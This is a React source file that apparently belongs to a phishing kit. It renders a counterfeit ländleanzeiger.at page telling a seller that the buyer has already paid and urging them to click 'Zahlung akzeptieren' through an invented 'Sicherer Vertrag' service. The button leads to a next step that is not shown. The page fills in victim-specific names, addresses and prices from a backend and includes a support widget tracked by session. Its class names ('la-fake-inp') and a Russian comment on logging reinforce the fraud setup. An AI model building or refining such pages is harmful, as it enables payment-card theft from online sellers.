import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import SupportWidget from './SupportWidget';
import './LandleananzeigenSuccess.css';

import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/landleanzeiger-logo.png`;
const BADGES_SRC = `${process.env.PUBLIC_URL || ''}/landleanzeiger-badges.png`;

const DE = {
  meinKonto: 'Mein Konto',
  inserieren: '+ Kostenlos inserieren',
  searchWhat: 'Was suchst Du?',
  allCats: 'Alle Kategorien',
  plzOrt: 'PLZ oder Ort',
  statusText:
    'Ihr Produkt ist bereits bezahlt! Sie können das Geld entgegennehmen. Der Käufer hat die Ware und die Lieferkosten bezahlt.',
  recipientTitle: 'Daten des Empfängers',
  fullName: 'Vollständiger Name',
  addrLabel: 'Adresse des Empfängers',
  secureTitle: 'Sicherstellung von Zahlungen',
  secureText:
    "Indem Sie auf die Schaltfläche 'Zahlung akzeptieren' klicken, akzeptieren Sie einen Vertrag über den Verkauf von Waren über den Online-Dienst 'Sicherer Vertrag'.",
  payBtn: 'Zahlung akzeptieren',
  foot1:
    'Sobald Sie das Geld erhalten haben, versenden Sie die Ware an die angegebene Adresse oder übergeben Sie sie dem Kurier.',
  foot2:
    'Nach dem Versand teilen Sie dem Käufer bitte innerhalb von 3 Werktagen eine Sendungsnummer mit.',
  col1h: 'Nützliche Informationen',
  hilfe: 'Hilfebereich',
  sicher: 'Sicherheitstipps',
  col2h: 'Partnerseiten',
  partnerTxt: 'Laendleanzeiger.at - Kleinanzeigenportal',
  col3h: 'Folge uns auf',
  col4h: 'App laden',
};

function IconUser() {
  return (
    <svg className="la-ico" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" aria-hidden>
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}

function IconHeart() {
  return (
    <svg className="la-ico la-ico--heart" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" aria-hidden>
      <path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z" />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="la-search-btn__ico" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" />
    </svg>
  );
}

function IconTruck() {
  return (
    <svg className="la-truck-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M20 8h-3V4H3c-1.1 0-2 .9-2 2v11h2c0 1.66 1.34 3 3 3s3-1.34 3-3h6c0 1.66 1.34 3 3 3s3-1.34 3-3h2v-5l-3-4zM6 18.5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5zm13.5-9l1.96 2.5H17V9.5h2.5zm-1.5 9c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"
      />
    </svg>
  );
}

function IconShield() {
  return (
    <svg className="la-shield-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4zm-1.41 14.59L7.41 12l1.41-1.41L11 12.17l4.59-4.58L17 9l-6 6z"
      />
    </svg>
  );
}

function IconCard() {
  return (
    <svg className="la-card-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M20 4H4c-1.11 0-1.99.89-1.99 2L2 18c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V6c0-1.11-.89-2-2-2zm0 14H4v-6h16v6zm0-10H4V6h16v2z"
      />
    </svg>
  );
}

function IconFb() {
  return (
    <svg className="la-soc" viewBox="0 0 24 24" aria-hidden>
      <path fill="#1877f2" d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z" />
    </svg>
  );
}

function IconIg() {
  return (
    <svg className="la-soc" viewBox="0 0 24 24" aria-hidden>
      <defs>
        <linearGradient id="laig-la" x1="0%" y1="100%" x2="100%" y2="0%">
          <stop offset="0%" stopColor="#f09433" />
          <stop offset="50%" stopColor="#e6683c" />
          <stop offset="100%" stopColor="#bc2a8d" />
        </linearGradient>
      </defs>
      <path
        fill="url(#laig-la)"
        d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zM12 0C8.741 0 8.333.014 7.053.072 2.695.272.273 2.69.073 7.052.014 8.333 0 8.741 0 12c0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98C8.333 23.986 8.741 24 12 24c3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98C15.668.014 15.259 0 12 0zm0 5.838a6.162 6.162 0 1 0 0 12.324 6.162 6.162 0 0 0 0-12.324zM12 16a4 4 0 1 1 0-8 4 4 0 0 1 0 8zm6.406-11.845a1.44 1.44 0 1 0 0 2.881 1.44 1.44 0 0 0 0-2.881z"
      />
    </svg>
  );
}

function PhotoPlaceholder() {
  return (
    <div className="la-ph-wrap" aria-hidden>
      <div className="la-ph-ico">
        <span>?</span>
      </div>
    </div>
  );
}

export default function LandleananzeigenSuccess() {
  const { pageCode: pageCodeParam } = useParams();
  const pageCodeFromParams = (() => {
    try {
      if (pageCodeParam) return pageCodeParam;
      const m = window.location.pathname.match(/\/page\/([A-Z0-9]{12})(?:\/|$)/i);
      return m ? m[1] : null;
    } catch {
      return null;
    }
  })();

  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [logoFailed, setLogoFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Olx2 */

  useEffect(() => {
    if (!pageCodeFromParams) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCodeFromParams}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCodeFromParams]);

  const countryCode = pageData?.country_code || 'AT';

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null) return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText = useMemo(() => {
    if (priceNumber == null) return '228';
    return priceNumber % 1 === 0 ? String(Math.round(priceNumber)) : String(priceNumber);
  }, [priceNumber]);

  const photoUrl = pageData?.photo_url || '';
  const productName =
    pageData?.product_name?.trim() || 'Gartenmöbel (Tisch, Bänke und Stühle)';
  const deliveryAddress = pageData?.delivery_address || '—';
  const buyerFirst = pageData?.first_name || '';
  const buyerLast = pageData?.last_name || '';
  const fullName = [buyerFirst, buyerLast].filter(Boolean).join(' ') || '—';
  const { toIndex2 } = usePaymentPaths(pageCodeFromParams);
  const index2Path = toIndex2();
  if (loading) {
    return (
      <div className="la-page la-page--loading">
        <div className="la-loading-bar" />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="la-page">
      <header className="la-top">
        <div className="la-top-inner">
          <div className="la-logo">
            {!logoFailed ? (
              <img
                src={LOGO_SRC}
                alt="ländleanzeiger.at"
                className="la-logo__img"
                onError={() => setLogoFailed(true)}
              />
            ) : (
              <span className="la-logo__fallback">
                <span className="la-logo__b">ländle</span>
                <span className="la-logo__o">anzeiger</span>
                <span className="la-logo__b">.at</span>
              </span>
            )}
          </div>
          <div className="la-top-actions">
            <button type="button" className="la-link-account">
              <IconUser />
              {DE.meinKonto}
            </button>
            <button type="button" className="la-icon-btn" aria-label="Merkliste">
              <IconHeart />
            </button>
            <button type="button" className="la-btn-inserieren">
              {DE.inserieren}
            </button>
          </div>
        </div>
      </header>

      <div className="la-search-strip">
        <div className="la-search-inner">
          <input type="text" className="la-inp la-inp--lg" placeholder={DE.searchWhat} readOnly />
          <select className="la-sel" aria-label={DE.allCats} disabled defaultValue="all">
            <option value="all">{DE.allCats}</option>
          </select>
          <input type="text" className="la-inp" placeholder={DE.plzOrt} readOnly />
          <select className="la-sel" aria-label={DE.allCats} disabled defaultValue="all">
            <option value="all">{DE.allCats}</option>
          </select>
          <button type="button" className="la-search-btn" aria-label="Suchen">
            <IconSearch />
          </button>
        </div>
      </div>

      <main className="la-main">
        <div className="la-main-inner">
          <div className="la-grid">
            <section className="la-col la-col--left">
              <div className="la-photo-box">
                {photoUrl ? <img src={photoUrl} alt="" className="la-photo" /> : <PhotoPlaceholder />}
              </div>
              <h1 className="la-product-title">{productName}</h1>
              <div className="la-price">
                {priceText} €
              </div>
            </section>

            <section className="la-col la-col--right">
              <div className="la-card la-card--status">
                <div className="la-status-head">
                  <div className="la-status-ico-wrap" aria-hidden>
                    <IconTruck />
                  </div>
                  <p className="la-status-txt">{DE.statusText}</p>
                </div>
              </div>

              <div className="la-card">
                <div className="la-card-head">{DE.recipientTitle}</div>
                <label className="la-fake-label">{DE.fullName}</label>
                <input type="text" className="la-fake-inp" readOnly value={fullName} />
                <label className="la-fake-label">{DE.addrLabel}</label>
                <input type="text" className="la-fake-inp" readOnly value={deliveryAddress} />
              </div>

              <div className="la-card la-card--pay">
                <div className="la-pay-flex">
                  <div className="la-pay-left">
                    <div className="la-shield-wrap" aria-hidden>
                      <IconShield />
                    </div>
                    <div>
                      <div className="la-pay-title">{DE.secureTitle}</div>
                      <p className="la-pay-desc">{DE.secureText}</p>
                    </div>
                  </div>
                  <Link to={index2Path} className="la-pay-cta">
                    <IconCard />
                    <span className="la-pay-cta__lines">
                      <span>Zahlung</span>
                      <span>akzeptieren</span>
                    </span>
                  </Link>
                </div>
              </div>
            </section>
          </div>

          <div className="la-footnotes">
            <p>{DE.foot1}</p>
            <p>{DE.foot2}</p>
          </div>
        </div>
      </main>

      <footer className="la-footer">
        <div className="la-footer-inner">
          <div className="la-foot-col">
            <div className="la-foot-h">{DE.col1h}</div>
            <a href="#h" className="la-foot-a">{DE.hilfe}</a>
            <a href="#s" className="la-foot-a">{DE.sicher}</a>
          </div>
          <div className="la-foot-col">
            <div className="la-foot-h">{DE.col2h}</div>
            <p className="la-foot-p">{DE.partnerTxt}</p>
          </div>
          <div className="la-foot-col">
            <div className="la-foot-h">{DE.col3h}</div>
            <div className="la-soc-row">
              <a href="#fb" className="la-soc-link" aria-label="Facebook">
                <IconFb />
              </a>
              <a href="#ig" className="la-soc-link" aria-label="Instagram">
                <IconIg />
              </a>
            </div>
          </div>
          <div className="la-foot-col la-foot-col--badges">
            <div className="la-foot-h">{DE.col4h}</div>
            <img src={BADGES_SRC} alt="" className="la-badges-img" />
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}
